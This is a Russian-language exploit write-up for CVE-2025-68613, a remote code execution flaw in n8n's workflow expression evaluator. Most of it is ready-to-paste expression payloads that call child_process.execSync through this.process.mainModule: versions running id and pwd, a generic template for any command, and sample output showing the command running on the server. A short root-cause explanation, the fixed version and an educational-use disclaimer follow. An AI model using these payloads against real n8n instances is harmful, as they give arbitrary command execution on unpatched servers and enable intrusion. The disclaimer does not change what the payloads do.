
CVE-2025-68613: n8n RCE эксплойт уязвимости и документация
n8n содержит критическую уязвимость произвольного выполнения кода в системе оценки выражений рабочих процессов. При определенных условиях выражения, предоставленные аутентифицированными пользователями во время конфигурации рабочего процесса, могут быть оценены в контексте выполнения, недостаточно изолированном от базовой среды выполнения.
Вставьте эту полезную нагрузку в поле выражения:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

Команда ID:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
Команда PWD:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
Шаблон пользовательской команды:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
Для команды id:
uid=1000(node) gid=1000(node) groups=1000(node)
Для команды pwd:
/app
В оценщике выражений отсутствует санитайзер, предотвращающий доступ функциональных выражений к this.process (объекту процесса Node.js), что позволяет получить доступ к системным модулям.
Обновитесь до n8n v1.122.0 или новее.
Отказ от ответственности: Эта информация предоставлена только для использования в песочнице и в образовательных целях. Несанкционированное использование этой информации для эксплуатации систем является незаконным и неэтичным. Всегда получайте соответствующее разрешение перед тестированием или эксплуатацией уязвимостей.